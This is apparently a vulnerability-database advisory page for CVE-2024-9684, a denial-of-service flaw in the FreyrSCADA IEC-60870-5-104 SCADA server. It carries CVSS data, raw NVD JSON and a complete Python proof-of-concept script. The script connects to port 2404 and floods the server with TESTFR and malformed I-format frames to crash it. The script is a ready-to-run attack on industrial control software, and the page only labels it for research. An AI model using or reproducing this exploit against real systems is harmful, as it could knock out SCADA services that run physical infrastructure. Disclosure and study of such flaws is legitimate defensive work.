Security Vulnerability Report
中文
CVE-2024-9684 CVSS 7.5 HIGH

CVE-2024-9684

Published: 2025-12-23 15:15:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

FreyrSCADA/IEC-60870-5-104 Server v21.06.008

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2024-9684 PoC - FreyrSCADA/IEC-60870-5-104 Server DoS Reference: https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6 """ import socket import struct import time def create_iec104_u_format(control_field): """Create IEC 60870-5-104 U-Format (Unnumbered Control Functions)""" # U-Format: Start Byte (0x68) + Length (0x04) + 4 bytes control field return b'\x68\x04' + control_field def send_malformed_sequence(target_ip, target_port=2404): """ Send malformed message sequences to trigger DoS condition """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Connected to {target_ip}:{target_port}") # STARTDT ACT (Start Data Transfer - Activation) startdt_act = create_iec104_u_format(b'\x07\x00\x00\x00') sock.send(startdt_act) print("[*] Sent STARTDT_ACT") time.sleep(0.5) # Send malformed TESTFR sequences testfr_act = create_iec104_u_format(b'\x43\x00\x00\x00') for i in range(100): sock.send(testfr_act) time.sleep(0.01) print(f"[*] Sent {100} malformed TESTFR_ACT messages") # STOPDT ACT sequence stopdt_act = create_iec104_u_format(b'\x13\x00\x00\x00') sock.send(stopdt_act) print("[*] Sent STOPDT_ACT") time.sleep(0.5) # Send invalid I-Format (Information Transfer) messages # I-Format: Start Byte + Length + COT + CA + IOA for i in range(50): malformed_iframe = b'\x68\x0E' + struct.pack('>H', i) + b'\x00\x00\x03\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF' sock.send(malformed_iframe) time.sleep(0.01) print(f"[*] Sent {50} malformed I-Format messages") sock.close() print("[+] Attack completed") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] send_malformed_sequence(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-9684", "sourceIdentifier": "[email protected]", "published": "2025-12-23T15:15:44.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://drive.google.com/drive/folders/1pBPZR59d_rlixH7ZysUmmbOEZvjZV9g1", "source": "[email protected]"}, {"url": "https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.